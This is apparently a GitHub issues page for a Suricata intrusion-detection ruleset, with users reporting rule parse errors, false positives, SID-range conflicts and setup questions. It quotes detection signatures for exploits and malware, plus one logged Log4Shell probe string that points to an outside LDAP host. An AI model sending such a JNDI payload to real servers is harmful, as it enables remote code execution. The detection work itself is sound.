ptresearch / attackdetection Goto Github PK

The rule:
https://github.com/ptresearch/AttackDetection/blob/master/CVE-2019-0232/cve-2019-0232.rules

The Error:
9/7/2019 -- 19:24:31 - -- [ERRCODE: SC_ERR_INVALID_SIGNATURE(39)] - Unable to parse "reference" keyword argument - "wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232". Invalid argument.
9/7/2019 -- 19:24:31 - -- [ERRCODE: SC_ERR_INVALID_SIGNATURE(39)] - error parsing signature "alert http any any -> any any (msg: "ATTACK [PTsecurity] Apache Tomcat RCE on Windows (CVE-2019-0232)"; flow: established, to_server; content: "?&"; http_raw_uri; pcre: "/.(?:bat|cmd)?&/I"; reference: cve, 2019-0232; reference: wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232; reference: url, github.com/ptresearch/AttackDetection; metadata: Open Ptsecurity.com ruleset; classtype: attempted-admin; sid: 10004953; rev: 1;)" from file /var/lib/suricata/rules/suricata.rules at line 2738

Topic:

18/9/2018 -- 16:13:31 - <Notice> - This is Suricata version 3.2.1 RELEASE
18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_UNKNOWN_VALUE(129)] - Unknown Classtype: "malicious-redirect".  Invalidating the Signature

18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_INVALID_SIGNATURE(39)] - error parsing signature "alert http $HOME_NET any -> $EXTERNAL_NET any (msg: "ATTACK [PTsecurity] GNU Wget http request"; content: "wget"; http_user_agent; nocase; depth: 4; flowbits: set, 10000062; flowbits: noalert; reference: cve, 2016-4971; classtype:malicious-redirect; reference: url, legalhackers.com/advisories/Wget-Arbitrary-File-Upload-Vulnerability-Exploit.txt; reference: url, github.com/ptre" from file /etc/suricata/rules/pt-rules.rules at line 35eset; sid: 10000062; rev: 2; )
18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_UNKNOWN_VALUE(129)] - Unknown Classtype: "malicious-redirect".  Invalidating the Signature

18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_INVALID_SIGNATURE(39)] - error parsing signature "alert http $EXTERNAL_NET any -> $HOME_NET any (msg: "ATTACK [PTsecurity] GNU Wget < 1.18 Arbitrary File Upload / Potential Remote Code Execution"; flowbits: isset, 10000062; content: "30"; http_stat_code; depth: 2; content: "Location: ftp://"; nocase; http_header; reference: cve, 2016-4971; classtype:malicious-redirect; reference: url, legalhackers.com/advisories/Wget-Arbitrar" from file /etc/suricata/rules/pt-rules.rules at line 37github.com/ptresearch/AttackDetection; metadata: Open Ptsecurity.com ruleset; sid: 10000063; rev: 2; )
18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_PCRE_MATCH(2)] - pcre_exec failed: ret -1, optstr ";sid: 10001759; rev: 2;"

18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_INVALID_SIGNATURE(39)] - error parsing signature "alert tls $EXTERNAL_NET any -> $HOME_NET any (msg: "MALWARE [PTsecurity] Trickbot/Dyre/Dridex #2";flow: established, to_client;content: "|17 03 01 00 F0|";depth:5;content: "|17 03 01  00 20|";distance:240;within:5;content: "|17 03 01|";distance:32;within:3;stream_size: server, <,30000;stream_size: client, <,30000;flowbits: isset, FB320221_0; flowbits: unset, FB320221_0; flowbits: set, FB320221_1; flowbits: noalert ; classtype: trojan-activity;metadata: autosign, id_320221, created_at 2017_8_11 reference: url, github.com/ptresearch/At" from file /etc/suricata/rules/pt-rules.rules at line 143 10001759; rev: 2;)

18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_PCRE_MATCH(2)] - pcre_exec failed: ret -1, optstr ";sid: 10001760; rev: 1;"
18/9/2018 -- 16:13:50 - <Error> - [ERRCODE: SC_ERR_INVALID_SIGNATURE(39)] - error parsing signature "alert tls $EXTERNAL_NET any -> $HOME_NET any (msg: "MALWARE [PTsecurity] Trickbot/Dyre/Dridex #3";flow: established, to_client;content: "|17 03 01 01 00|"; depth:5; content: "|17 03 01  00 20|"; distance:256; within:5; content: "|17 03 01|";distance:32;within:3;stream_size: server, <,30000;stream_size: client, <,30000;flowbits: isset, FB320221_0; flowbits: unset, FB320221_0; flowbits: set, FB320221_1; classtype: trojan-activity;metadata: autosign, id_320221, created_at 2017_8_11 reference: url, github.com/ptresearch/AttackDetection; " from file /etc/suricata/rules/pt-rules.rules at line 145 1;)

Добрый день. Как и куда вставлять эти правила: apt31.rules?

I Downloaded and pcap file?

How to launch pcap file.

Can you tell me what is the default password?

It is probably a simple enhancement to add data size check to match the DNS registry edit that was suggested. BTW, I know the packet overhead is not accounted for in this DNS check

dsize:>65280

This update will avoid SIG rules that are normal responses and are not attempting the heap overflow.

Vijay

В разделе License написано "under under"

hi team,

found when attempting to enable/update through suricata-update

1/12/2020 -- 18:49:42 - <Error> -- [ERRCODE: SC_ERR_RULE_KEYWORD_UNKNOWN(102)] - unknown rule keyword 'created_at 2017_7_19'.
11/12/2020 -- 18:49:42 - <Error> -- [ERRCODE: SC_ERR_INVALID_SIGNATURE(39)] - error parsing signature "alert tcp $HOME_NET any -> $EXTERNAL_NET 443 (msg: "POLICY [PTsecurity] Telegram Messenger v1 pkt checker #1"; flow: established, to_server; dsize: 89; stream_size: client, <,1500; flowbits: noalert; flowbits: isset, FB_Telegram_0; flowbits: unset, FB_Telegram_0; flowbits: set, FB_Telegram_1; classtype: trojan-activity; created_at 2017_7_19; reference: url, github.com/ptresearch/AttackDetection; sid: 11001579; rev: 1;)" from file /var/lib/suricata/rules/suricata.rules at line 27988

i'm learning CVE-2016-6304

http://cmpload.cmcm.com/download/taptapdash/large/1502424501260_92/anttd0815kpbg_en.png triggers rule 10000082.

Ran into an issue when using these in conjunction with EmergingThreats and Scirius.

pt-rules.rules

./git-sources/3/rules/pt-rules.rules:alert tls $EXTERNAL_NET any -> $HOME_NET any ( msg: "MALWARE [PTsecurity] Backdoor.Java.Adwind.cu Certificate flowbit set 1"; flow: established, to_client;content: "|3082|";depth:300; content: "|3082|";distance:2;within:2; content: "|a00302010202|";distance:2;within:6; flowbits: set, FB332502_; flowbits: noalert; threshold: type limit, track by_src, count 1, seconds 30; metadata: former_category TROJAN; reference:md5,56e42156a1676b34f5350c01e34875d1; classtype:trojan-activity; reference: url, github.com/ptresearch/AttackDetection; metadata: Open Ptsecurity.com ruleset; sid: 2024751; rev:3; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, signature_severity Major, created_at 2017_09_21, malware_family Adwind, performance_impact Moderate, updated_at 2018_01_30;)

trojan.rules:

./git-sources/31/rules/trojan.rules:#alert tcp $EXTERNAL_NET [:32768] -> $HOME_NET any (msg:"ET TROJAN [PTsecurity] Backdoor.Java.Adwind.cu Certificate flowbit set 1"; flow:established, to_client; content:"|308204|"; depth:300; content:"|308203|"; distance:1; within:3; content:"|a0030201020204|"; distance:1; within:7; content:"|300d06092a864886f70d01010b05003081|"; distance:4; within:17; flowbits:set,FB332502_; flowbits:noalert; threshold:type limit, track by_src, count 1, seconds 30; metadata: former_category TROJAN; reference:md5,d93dd17a9adf84ca2839708d603d3bd6; classtype:trojan-activity; sid:2024751; rev:1; metadata:affected_product Windows_XP_Vista_7_8_10_Server_32_64_Bit, attack_target Client_Endpoint, deployment Perimeter, signature_severity Major, created_at 2017_09_21, malware_family Adwind, performance_impact Moderate, updated_at 2017_09_21;)

The conflict is preventing the rules from compiling correctly for Scirius.

If you go to the following site phoronix.com and browse the site your get this in my suricata logs
ET TROJAN [PTsecurity] Malicious SSL connection (Upatre Downloader CnC) cert

The only thing I can tell is its due to the cloudflare SSL cert with loads of domains in the alt san field of the cert

Hi, Today i found this rule was matched with wrong packet (in response):

• HTTP/1.1 404 Not Found Server: nginx Date: Sat, 11 Dec 2021 xx:xx:xxGMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 240 Connection: keep-alive E..........O~.G.Pp........P...0.. <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /${jndi:ldap://xxx.xxx.xxx.168:1389/Exploit} was not found on this server.</p>

So i think this is better to add "to_server" term to "flow" part.

look the picture:

Hi,

You can find an attempt to match exploitation of the vmware vmdir CVE-2020-3952 by checking for ldap modify operation on Administrators built-in group here https://github.com/gelim/CVE-2020-3952/blob/master/vmware.rules

That may require some more tuning. So I write here that FYI without specific PR.

Cheers,

-- Mathieu

Hi.
some rules have strange metadata
eg
"metadata: id_140409,created_at 2017_6_2, url, https://blog.fortinet.com/2016/07/27/bayrob-an-ancient-evil-awakens-ii"
(metadata "url" comma separated from value ("..blog.frtinet.."); metadata (id_140409) without value)
is it error in metadata format?
I guess the metadata should look like
"metadata: param value, param2 value2 "

I noticed the SID range mentioned in your README.md file doesn't match with the rules in the repository.

SID range
We use SID 10000000-10999999 for our rules.

There are some rules in the repository going beyond that range. Would it be possible to put your true SID range in the README.md file, or to fix the rules having an SID in the 11 millions, 20 millions and 21 millions range?
Thank you!

Lovely work!

# Note1: Please, set $DC_SERVERS address group in suricata.yaml config, so Active Directory rules could work properly.

How can I install this on suricata 6.0.3? I don't know how to configure?

Hi, what is the default password of the zip archives ? I can't find it.

From http://doc.emergingthreats.net/bin/view/Main/SidAllocation, it seems the range of SID used is reserved for local use. So it may be better to use another one. I don't know how allocation is working for this but it would be nice if you had your own range.